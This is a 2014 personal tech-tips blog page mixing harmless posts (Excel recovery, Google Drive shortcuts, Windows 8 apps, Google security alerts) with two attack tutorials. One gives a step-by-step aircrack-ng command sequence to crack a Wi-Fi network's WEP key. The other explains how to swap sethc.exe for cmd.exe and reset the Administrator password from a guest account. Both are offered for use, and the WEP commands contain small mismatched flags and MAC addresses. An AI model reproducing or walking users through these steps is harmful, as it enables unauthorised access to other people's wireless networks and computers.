Monday, January 27, 2014

How to Recover Lost Data From an Unsaved Spreadsheet

Enable Auto Recover Feature

Step 1 Click "Office" button (Top Left) and then "Excel Options" (Bottom Right).

Step 2 Click "Save" on the ‘Excel Options’ dialog box.

Step 3 Check mark the "Save AutoRecover information every __ minutes" to enable the option. Type a value for 
example "10" in the minutes text box – to set the frequency for Excel to save your data.

Step 4 Click "OK" to save settings.


Recover Document

Step 1 Launch Excel after a crash or unexpected shut down. The Document Recovery pane is displayed with up to
 three versions of the Excel document recovered.

Step 2 Click the "Down" arrow next to the file that you want to recover to open menu options.

Step 3 Click "Open" to view the document. To save - click "Save As" and type a filename in the "Save As" text box, 
and click "Save". 


Important The “Save” button is still your best friend. To make sure you don’t lose your current work,
 click Save (or press CTRL+S) often.

SIMPLE WI-FI WEP CRACK

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done! icon smile Simple Wi Fi WEP Crack [TUTORIAL]

Incoming search terms:

  • Crack WiFi (Tutorial)
  • wifi wep hacking
  • hacking wi fi access points
  • simple wpa crack
  • wifi wep crack
  • wifi hacker WEP
  • wifi hacker wep-by lu h
  • wifi crack
  • Wi-Fiクラック
  • Wi-Fi WEP hacker

Wednesday, January 22, 2014

SEO SERVICES

What is SEO?

Search engine optimization; simply it's the process that trying to optimize your site to get better rank in search engines like Google.

SEO process:

The key for Google ranking it to get good webpage optimized for search engines then get a powerful, safe and continuously link building strategy.
  • On-site optimization:Building your website with Google in mind, that's the core of this process. It usually includes Keyword research, webpage modifications, and on-site reports. We offer this as a free service with our other SEO services just contact us to get your site internally optimized for Google.




Tuesday, January 21, 2014

Hack Admin Account From Guest Account & Change Password

To hack admin account open Guest account with write access to system32. Here is how to do that just follow the steps below-
1. Firstly Go to C:/windows/system32
2. Copy cmd.exe and paste it on desktop.
3. Then Rename cmd.exe to sethc.exe
4. Also Copy the sethc.exe from system32 and paste it anywhere in window. (not in system32)
Now Copy the new sethc.exe which is actually cmd.exe to system 32, when windows asks for overwriting the file, then click yes.
(When asked to overwrite,overwrite the sethc.exe)
5. Now Logout from your guest account and at the user select window when window ask for select user,press shift key 5 times.
6. Instead of Sticky Key confirmation dialog box,command prompt with full administrator privileges will open.
7. Now type NET USER ADMINISTRATOR amitabh where “amitabh” is password, you can use any password you like and press enter.
8. You will see “ The Command completed successfully ” now type exit in cmd prompt and exit the command prompt.
Now login into admin account with your new password.

Google Drive Tips and Tricks


Topic
Details
Selecting Documents
- "j" key moves to the next item
- "k" key moves back to the previous item
- "x" can be used to check and uncheck the selected item
- Shift + "a" selects all
- Shift + "n" deselects all, or selects none
Creating Items
- Shift + "t" creates a new text document
- Shift + "s" creates a new spreadsheet
- Shift + "p" creates a new presentation
- Shift + "d" creates a new drawing
- Shift + "c" creates a new collection
- Shift + "f" creates a new folder
Displaying Menus
- "c" displays Create menu
- "u" displays Upload menu
- "a" displays Actions menu
- "r" displays Sort menu
- "v" displays View menu
Actions
- "s" key will star or unstar the selected item
- "." (period) pulls up Sharing Settings for the selected item
- "z" pulls up the Organize window for the selected item
- "d" pulls up the Details pane for the selected item
- "?" places the cursor in the search box
Tips
- Use the shortcut in Gmail to attach files from Google Drive without having to re-upload them
- Use Forms to collect data, and Google Drive will automatically compile the results into a spreadsheet  
- Save photos to Google Drive and edit them with programs like Pixlr Express*
- Edit videos using Pixorial Videos*
- Download music files and listen to them with Drive Music*  

How to Use Windows 8 Apps

Using Windows 8 Apps
apps
Windows 8 apps are any software programs that you install on your Windows 8 computer. Many apps can be purchased and downloaded from the Windows 8 apps Store, and Windows 8 apps comes with its own pre-installed apps, such as Maps and Calendar.   
Windows 8 provides a seamless experience between mobile and desktop computers. Part of this process involves the introduction of apps.
An app is any software program installed on your computer. For example, in Windows 7, Microsoft Word was a program. In Windows 8, Word is an app that can be accessed through both the Start screen and the Desktop.

Moving between Apps

To move between open apps, use any of the following three methods:
  • Press Alt+tab on the keyboard.
  • Swipe from the left with your finger (touchscreen).
  • With a mouse, click the upper left corner of the screen.
Users can multitask with two apps running on the screen at the same time. One app appears snapped in a strip on the left edge of the screen. The other app fills the rest of the screen.
You can easily resize the apps to make the smaller one big and vice versa. 

NOTE: This feature only works on screens that are wide enough to support having two apps side by side (more than 1366 pixels wide).

Closing Apps

Windows 8 apps do not have close buttons. When you change to another app, the previous app is suspended so that it is running in the background using very few system resources. If your system needs resources, Windows automatically closes the apps. When you re-open that app, you can continue where you left off.
If you want to completely close an app, use one of the following methods:
  • Move the mouse cursor to the top of the screen. When it changes from an arrow into a hand, drag it down to the bottom of the screen. Your app shrinks and then disappears off the bottom of the screen.
  • Press Alt+F4.
  • Press Ctrl+Shift+Esc to start Task Manager. Click the app in the apps list and click End Task.

Finding and opening files, settings, and apps

You can search for anything from the Start screen by typing on the keyboard. For example, to search for an HP app, type HP on the keyboard.You can also search using the Search charm:
  1. Press the Windows (Windows 8 keyboard key)  + C key to open the charms bar. 

    Search charm 
    Charms_Search
  2. Click Search

    Searching for an app 
    8.1_search_example
  3. Type the name of the app you want to open into the Search box, and then click your item in the search results to open it.

Saturday, January 18, 2014

Enable SMS Notifications on Suspicious Google Login Activity

Google has so many wonderful products and services which majority of internet users participates therein. Google products and services are numerous. Some of their products and services includesearching the internet, email, backing up of data, social media, website/blog monetization, advertising, Android and et al. To use any Google product or services, a Gmail account would be required as a source of ID.

What will happen to all the accounts you’ve created under your Gmail account, if peradventure your Gmail account get hacked? The outcome could be disastrous, as your access to the files you’ve backed up on Google, you email inbox and other Google products or services you’ve opted for would have been blocked.

In recent time, Google as allowed it users to get notifications via email in case there’s a suspicious login attempt on their account or their account password was changed. Although this might be good for some users, but it will be unfortunate if the email address is the Google account email hacked, as the email won’t be accessible anymore if it password has been changed by the perpetrator. Luckily, a new solution is now available. You can now set up a phone alert to get notified via SMS whenever any suspicious activity is noted on your account.
To activate the feature of receiving SMS whenever any suspicious activity is noted on your account, simply go to your Account Security Page at https://www.google.com/settings/security. Add yourmobile phone number. Google will send a one-time verification code on the phone number you’ve provided. To complete the process, enable phone notifications by checking the two notification boxes, although both boxes are checked by default (as seen in the image below)
Conclusively, it is important you have the most important security settings enabled for your Google account, i.e. the two-step verification. Though this has been made available by Google for some time now, it’s just a way by which Google link your account to the phone number you used to authorize login attempts. So whenever your account encounters any form of suspicious activity, Google will send a random code to your phone number which you will be requested to provide upon logi

How To Delete or Cancel a Google Plus Account


I want to share how you can easily cancel or delete a Google+ account without having any effect on other Google services (gmail, adsense, adword, docs etc.) you subscribed to. 


Steps to Cancel or Delete a Google+ Account
1) Log in into your Google Plus account
2) Locate and click on your account name or email address on the upper right corner and click on‘Account Settings’
3) In the account service page, locate and click on ‘Delete profile and remove associated social features’.
4) On the next page, select ‘Delete Google+ content’ and then click ‘Remove selected services’.
That’s all. Once you’ve compete the steps outlined above, you’re no longer among Google+ services or its circles. But you can rejoin back in the future if you desire to.

Mr. Bean Greeting Notification Widget for Blogger


You can beautify your blog by placing Mr. Bean greeting notification widget on your blog. This widget will float to any side of your blog where you want it to stay. Some top blogs are using this widget on their blog.



Mr Bean Widget For Blogger
To install Mr. Bean greeting notification widget on your blog, all you need to do is to copy any of the widget code from the boxes below and paste it in your blog template.

How to Add Mr. Bean Notification Widget to Blogger Blog

==> Go to your blog dashboard >> Layout >> Add a Gadget >>Select “HTML/JavaScript”
==> Copy and paste any of the code below into the HTML/JavaScript box and save your template





How to enable and disable Task manager manually

Many times you have faced problem of “task manager has been disabled”. Task manager is the important tool of windows and has many uses. If you want to enable and disable task manager manually follow these steps.
Steps:
1. Go to Start->Run and type gpedit.msc press ENTER
2. In the group policy window navigate to User Configuration –>Administrative Templates –>System –>Ctrl+Alt+Del options
3. Then open Remove Task Manager, in that there are there options Not Configured, Enabled, Disabled, by default Not configured is selected
4. To enable the task manager select disabled and press ok.
5. To disable the task manager select enabled and press ok.

Edit registry direct from firefox browser

Many times in my older posts i had written some registry tricks which require to edit registry. i also posted downloadable registry editor files. Today i have a trick wich will allow you to edit your windows registry direct from the browser.  This tricks works on firefox browser with Open In RegEdit add on. After installing this add on, you just need to select registry keys and right click on the key, then open in Regedit.
Example: If you want to enter this key directly, then select it, then right click then Open In Regedit! simple, isn’t it?

Google makes first contact lens

Google makes its first contact lenses
First contact from Google.
Search engine giant Google (NASDAQ:GOOG) has always had a Cyclopean-like focus on high-tech research. All research related to the human eye or vision is a particular favorite of the company. Bloggers over the years have regaled us with spellbinding accounts of autonomous automobiles, fashion crimes on frames of glass, and balloons broadcasting Wi-Fi from clear skies above. All fanciful stories of technology brought to Earth from the rarefied aerie of Google's secretive research facility.

Friday, January 17, 2014

How to install backtrack 5 in windows using virtualbox Video Tutorial




Must be familiar with Backtrack. But the new version of Backtrack, the 5 release is for the most savvy security professionals and early new comers to in information security field.
But why to remove you're previous OS, the solution is boot Backtrack in Oracle VM VirtualBox the software designed for Operating Systems. Here i'm gonna show you how to Boot Backtrack 5 in VBox. 

Firstly Download the Virtual Box from the link:
https://www.virtualbox.org/wiki/Downloads
and Install it on your OS.

&&& Download the new version Backtrack 5 from the below link:
http://www.backtrack-linux.org/downloads/

Total Pageviews

Popular Posts

Blog Archive

© 2014 All rights reserved Amitabh Singh. Powered by Blogger.